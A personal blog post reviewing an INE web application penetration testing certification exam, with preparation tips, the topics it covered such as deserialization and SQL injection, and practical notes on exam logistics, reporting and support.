I don’t think I need an introduction of my self for those who are reading. I have been working as an Engineer Application Security. I found it much more challenging to work in Application security than as a Network Penetration tester but that’s just me.
Let’s talk about the exam. It was hard for me maybe because I didn’t really take the course, I didn’t have any labs to practice from INE. I bought the exam voucher on black Friday sale and thought why not give it a try maybe I might pass or just fail and loose $200.
For practice I did a lot vulnerable apps like webgoat, juiceshop stuff like that and also really important to understand and complete the portswigger labs.
I completed the exam on the 5th day. I had a lot of difficulties while trying to find some of the vulnerabilities and yea people who think that web pentesting can be done just by running a scan, sorry to say you will fail. Scanners didn’t show anything at all. Most of the things had to be done manually.
Some exploits are straight forward others might have to struggle a lot, I know I did. Maybe I’m not that good.
Most important topics might be but not limited would be Javascript Deserialization, Java Deserialization, PHP Deserialization, SQL injection and many more. Keep in mind that you have to bypass WAF so just be prepared for that. Be familiar with OWASP top 10 and learn how to exploit manually. While exploit RCE remember to always check the incoming sudo tcpdump -i tap0 saved my life.
If the exploits don’t work then try to reset the environment. You will get 4 resets in very 24 hours. Exam environment was stable but as I said might have to reset just in case that somethings don’t work.
Be prepared with the payloads, be familiar with burpsuite and try to get burpsuite pro because you might need to use intruder with the payloads you have, I know I did and thank god I had burpsuite professional.
A bit of scripting can make your life easy. Don’t have to be a pro but general idea on how to do certain things.
You will have 7 days for the exam and another 7 days to complete the report. After the first 7 days the exam environment will be disabled so make sure you have all the screenshots you will need for the report.
Report needs to be very professional it’s a pentest so expect to make a full report with all the screenshots and detail guide on how each and every vulnerability was exploited. My report had 85 pages.
I submitted my exam report on 10th December 2023 and got a reply on 4th Jan 2024. It’s best to forget about the exam as soon as report is submitted. I checked the portal and email everyday just to see if I passed or not, was stressful.
INE responds only from Monday to Friday. Saturday and Sunday are holidays so you can’t reach them.
I want to thank Johnathan from INE Technical Support Team – Tier 2 for helping me out with some problems I was facing during the exam. He was really helpful and was really fast at replying to the emails, Excellent work Johnathan hope you get a promotion or a raise because of your excellent support.
I guess that’s mostly it. The exam was worth the money and time that I had to spent, it was hard but loved everything about it.
Be First to Comment